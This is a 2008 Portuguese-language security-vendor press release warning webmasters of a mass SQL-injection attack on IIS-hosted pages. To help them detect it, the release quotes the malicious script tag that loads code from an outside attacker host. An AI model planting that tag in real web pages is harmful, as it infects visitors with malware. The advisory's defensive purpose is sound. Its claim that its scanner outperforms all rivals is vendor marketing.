Encontra-se em: Panda Security > Home Users > About Panda > press-releases > Lista dos últimos press releases

RssBurner ViewNews True 0

Panda Security aconselha webmasters a verificar páginas Web devido a ciber-ataque massivo

29/04/2008 0:00:00. Untitled 1

O PandaLabs reportou uma vulnerabilidade nos servidores Internet Information Services da Microsoft, que está a permitir um ciberataque massivo. Actualmente, este ataque afecta 282 mil páginas Web, e este número poderá aumentar drasticamente.

 

Este problema de segurança permite aos hackers injectar um código SQL em todas as páginas armazenadas num servidor Web. Este código foi concebido de forma a redireccionar todos os visitantes de páginas infectadas para um site malicioso que tenta localizar nos sistemas vulnerabilidades que possam ser utilizadas para realizar o download de todo o tipo de ameaças.

 

A situação é agravada pelo facto de a maioria das páginas Web afectadas não exibirem quaisquer sinais suspeitos e de muitas delas serem bastante visitadas.

 

Como detectar se uma página Web foi manipulada

 

A Panda Security aconselha todos os webmasters com sites alojados em servidores Internet Information Services a verificar o mais rapidamente possível se as suas páginas Web foram afectadas. O procedimento é simples, já que envolve a localização de uma string de código específica no código fonte da página Web, associada a uma tag IFRAME. Esta string é:

 

<script src=http://www.nihaorr1.com/1.js>

 

Caso seja detectada, deverá ser eliminada imediatamente e os responsáveis pela administração do servidor onde as páginas Web estão armazenadas deverão ser avisados para implementar as medidas de segurança correspondentes.

 

Devido ao elevado número de sites afectados, muitos utilizadores poderão ter sido infectados por todo o tipo de códigos maliciosos, incluindo novas variantes ainda não identificadas pelas empresas de segurança. Para verificar se os sistemas estão infectados, a Panda Security aconselha os utilizadores a visitar o site http://www.infectedornot.com, e a analisar gratuitamente os seus computadores com o scanner online, ActiveScan 2.0, uma solução de segurança que opera com base na “Inteligência Colectiva” e é capaz de detectar muitas mais ameaças do que qualquer outra solução de segurança.

Mais informações disponíveis no blog do PandaLabs: http://www.pandalabs.com

 

 

  • Feed RSS para press releases

  http://www.pandasecurity.com/virus_info/exports/rss/pandapt.xml

 

  • Adicione esta notícia a MyWeb

 

 

Comunicação Portugal
E-mail: comunicacao@pt.pandasecurity.com
Número de telefone: + 351 219 42 68 00